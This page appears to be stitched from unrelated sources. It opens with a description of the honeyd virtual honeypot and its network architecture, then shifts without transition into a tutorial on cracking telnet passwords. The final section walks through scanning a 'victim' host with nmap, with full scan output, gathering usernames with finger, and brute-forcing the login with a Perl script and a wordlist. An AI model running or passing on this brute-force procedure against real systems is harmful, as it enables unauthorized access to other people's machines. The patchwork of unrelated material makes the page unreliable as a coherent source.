HoneyD Network Architecture

As can be seen, the design has three distinct network segments:

• Publicly route-able IPs
• Internal network for honeypot hosts
• Virtual network for honeyd guest systems. These IP addresses sit on loopback interface on the host, with a static route on the firewall to pass all virtual traffic to the honeyd host.

Using a perimeter firewall with NAT/PAT capabilities allows easy switching between emulated systems and services if your public IP resources are limited; a large network of guests can be configured in advance and left static, then a quick firewall change is all that is required to expose different systems to the world.

Additionally, as much as honeypot systems are designed to be compromised and collect information of malicious attacks (or perhaps more correctly, because of this) , low-interaction systems like honeyd is designed to avoid full compromise. If something goes wrong and the host system gets fully compromised, a (sufficiently configured) perimeter firewall provides some control of outgoing traffic, limiting the attackers options for using the honeypot sensor to attack other systems.

HoneyD -- A Virtual Honeypot

Introduction
Welcome, fellow hackers! This time, I will review a very nice hacking tool that I really find interesting: honeyd (pronounced “honey-dee” or “honey-daemon”). It is a powerful virtual honeypot tool written by Niels Provos and released as open source under the GNU General Public License, as part of the Honeynet project. It runs on GNU/Linux distributions and *BSD’s.

To anyone who doesn’t know, a honeypot is a public or private computer that is intentionally left insecure, unpatched, without an antivirus or firewall, etc. which actually encourages malicious hackers to attack it. This is a perfect tool for catching potential black-hat network intruders or spammers and monitoring their behavior, or even giving hackers a huge playground to explore andput their networking skills to the test without disrupting others.

If you have the cash, you can even set up multiple honeypots in your home or workplace, which act as convincing “decoy machines” that can help protect your legitimate computers from crackers. Networks like these are called honeynets. Now, let’s back up a bit. Note the keywords in the first sentence: If you have the cash. Setting up a honeynet as a hobbyist can be hard, space-wise and money-wise, but honeyd solves both of these issues completely with a quite revolutionary technology: virtual honeypots.

HoneyD is a Virtual Honeypot

Your typical, run-of-the-mill honeypots are made up of physical computers interlinked together, and finally, to the internet, should you wish. While it is foolproof, works effectively, and makes logging and forensics simple, it can be very costly to set up for a hobbyist, as it requires them to buy many large servers,  baby them, and run up the home electric bill. Remember that in most cases, more = better. There is also the additional risk of a malware infection leaking out of a honeypot onto a legitimate computer and destroying it.

The best way to solve this problem virtual honeypot, which is basically a daemon running on one or a several computers that generates virtual honeypot computers and places them on the network. Instead of having to buy and set up multiple physical computers, you now only need one computer which can generate as many virtual honeypots as you wish.

honeyd is an open source application that tries to achieve that goal. Each and every honeypot is defined as a config file that you load and deploy. You can define virtually any aspect of these honeypots with a simple text editor, such as its operating system, ports, and more. Through the “honeyd-common” package, found in most Debian/*buntu repositories, honeyd can emulate a whole slew of port services, such as HTTP, FTP, telnet, rsh, SMTP, and plenty more.

When would a virtual honeypot be used in the real world? Here is an example scenario: a small company has three servers full of important data that it needs to protect vigilantly, as it cannot risk a malicious hacker break-in. All of the servers have an IDS (intrusion detection system) installed. If one of the servers is running honeyd, it will appear to any attackers that there are hundreds of computers on the network, when really there are only three.

The attacker will have to do much more research and perhaps think twice before hacking, for if they make one mistake and attack a honeypot, then the IDS will have them caught red-handed. Their IP address and attack methods will be logged, their port listings and network traffic recorded, and the timeframes noted. Remember that all of the attack’s details can be accessed and observed in real-time from the three legitimate servers running honeyd. It truly is the perfect trap, don’t you think?


  Feature List

• Manipulates TCP/IP packets to create the illusion that there is a host on the network.
• At the time of this writing, honeyd supports up to 65,536 hosts at once.
• Convincingly emulates a plethora of port services.
• Can impersonate up to a thousand different operating systems.
• User can define unique virtual hosts using simple config files.
• Lets you catch spammers and network intruders, as well as observe the their behaviors.
• Safe and isolated from the true host computer(s).

Crack Telnet Password Using Brute Force

First Install Zenmap on your ubuntu machine:
sudo apt-get install zenmap

Now open your terminal and use following command to check open ports on victim's system
nmapfe
now in gui prompt put the ip address of victim in target box.

Output(sample):

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-11 07:20 IST
NSE: Loaded 36 scripts for scanning.
Initiating ARP Ping Scan at 07:20
Scanning 192.168.2.10 [1 port]
Completed ARP Ping Scan at 07:20, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:20
Completed Parallel DNS resolution of 1 host. at 07:20, 0.09s elapsed
Initiating SYN Stealth Scan at 07:20
Scanning 192.168.2.10 [1000 ports]
Discovered open port 445/tcp on 192.168.2.10
Discovered open port 80/tcp on 192.168.2.10
Discovered open port 23/tcp on 192.168.2.10
Discovered open port 139/tcp on 192.168.2.10
Completed SYN Stealth Scan at 07:20, 2.70s elapsed (1000 total ports)
Initiating Service scan at 07:20
Scanning 4 services on 192.168.2.10
Completed Service scan at 07:20, 11.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.2.10
Retrying OS detection (try #2) against 192.168.2.10
Retrying OS detection (try #3) against 192.168.2.10
Retrying OS detection (try #4) against 192.168.2.10
Retrying OS detection (try #5) against 192.168.2.10
NSE: Script scanning 192.168.2.10.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 07:21
Completed NSE at 07:21, 0.08s elapsed
NSE: Script Scanning completed.
Nmap scan report for 192.168.2.10
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
23/tcp  open  telnet      Linux telnetd
80/tcp  open  http        Apache httpd 2.2.17 ((Ubuntu))
|_html-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:24:2B:DB:74:9F (Hon Hai Precision Ind.Co.)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.21%D=4/11%OT=23%CT=1%CU=35230%PV=Y%DS=1%DC=D%G=Y%M=00242B%TM=4F
OS:84E390%P=i686-pc-linux-gnu)SEQ(SP=CA%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST
OS:11NW6%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)EC
OS:N(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M5B4ST11NW6%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)


Uptime guess: 0.011 days (since Wed Apr 11 07:05:17 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux


Host script results:
| nbstat:  
|   NetBIOS name: UMESH-VOSTRO151, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UMESH-VOSTRO151<00>  Flags: <unique><active>
|     UMESH-VOSTRO151<03>  Flags: <unique><active>
|     UMESH-VOSTRO151<20>  Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|_    WORKGROUP<00>        Flags: <group><active>
| smb-os-discovery:  
|   OS: Unix (Samba 3.5.8)
|   Name: Unknown\Unknown
|_  System time: 2012-04-11 07:21:12 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol


HOP RTT     ADDRESS
1   2.10 ms 192.168.2.10


Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.00 seconds
           Raw packets sent: 1134 (53.704KB) | Rcvd: 1076 (46.608KB)

Now Download following files and extract them:

1:telnet_crack.pl

2:word_polish

Open a new Terminal and browse to extracted files and put following command in it:

To get the username use:

finger@ 192.168.2.10 (ipaddress of victim)
output:

umesh root

Now To brute-force run perl script with given parameters.

perl Telnet_Crack.pl -h 192.168.2.10 -u umesh -P polish

output:

TRYING : USERNAME = XXXX PASSWORD = password

ATTEMPTING CONNECTION TO 192.168.2.10.

OK ... CONNECTED!!!

it will take time and it depends on the strength of password that how long you have to wait to get the result.